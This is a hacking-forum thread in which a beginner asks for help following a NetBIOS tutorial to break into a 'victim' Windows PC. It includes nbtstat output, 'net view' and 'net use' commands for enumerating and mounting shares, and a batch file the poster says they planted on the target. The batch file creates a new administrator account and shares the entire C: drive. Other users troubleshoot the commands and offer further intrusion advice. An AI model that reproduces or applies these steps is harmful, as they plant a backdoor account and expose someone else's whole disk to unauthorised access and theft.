Welcome to HBH! If you have tried to register and didn't get a verification email, please using the following link to resend the verification email.

Netbios hacking

0 0

Hey im quite new on this website and im spending much time in reading and learning how to hack. I was reading the article about hacking someones harddisk, and i came to this point

Name Type Status

user <00> UNIQUE Registered workgroup <00> GROUP Registered user <03> UNIQUE Registered user <20> UNIQUE Registered

MAC Address = 00-02-44-14-23-E6

Note the <20>. It shows that the victim has enabled the file and printer sharing. So other wise if the <20> isnt there then its also not vulnerable.

I did this step and i got the same message witch showed the system of my victem is vulnerable (victem is in my case a good friend witch allowed me to try and hack him)

bUt now i stumbled acros the next step

Next we will use cmd. Type in the following: net view \127.0.0.1

If you get this then your good again:

Shared resources at \203.195.136.156 ComputerNameGoesHere

Share name Type Used as Comment

When i type: net view \127.0.0.1 it tells me: system error 123 when i type: net view\127.0.0.1 i come into some sort of menu:

net [ACCOUNTS | COMPUTERS | CONFIG | CONTINUE | FILE | GROUP etc. etc.

does anyone know what i am doing wrong?:(

0 0

Ok. I tryed some things but it still doesnt work. I made a screenshot of my dos. Can u tell me what im doing wrong?

0 0

Ïm still getting the same error. Does this mean that my friends pc is still secure?

0 0

Is there another way to get into a windows pc?

0 0

ya, theres about a million

0 0

Looks like i must try to get some info myself :happy:

0 0

when u see the "net [menu | other menu]" that can only be because of you got the syntax wrong so its showing you the correct one

net view\127.0.0.1 you gotta put a space like this net view \127.0.0.1 (and i tihnk the slash is worng too)

0 0

Ok i started with a new aprouch.

I managed to get a bat file into the victims system. The batfile contained the following:

net user redroest /add net localgroup administrators redroest /add net share system=C:\ /unlimited

In my own command prompt I typed the following:

net use \\ip redroest

Now it tells me: ''system error 53 has occured'' What am i doing wrong? I tryed many things but nothing worked. (When I ping the ip it shows a near perfect connection)

0 0

Does netbios hacking even work anymore?

0 0

ya, it works, but there are VERY few vulnerable computers anymore.

0 0

I've seen a bunch of tutorials / info on this type of hacking, so I would recommend you go checking those out ( I think there are some on this site, actually ).

0 0

this may sound like a really really stupid question but i have seen people do this before: are you acctually typing in '127.0.0.1' or are you typing in your target ip?

0 0

lol 127.0.0.1 will come back to you, so any attack you try to do will come right back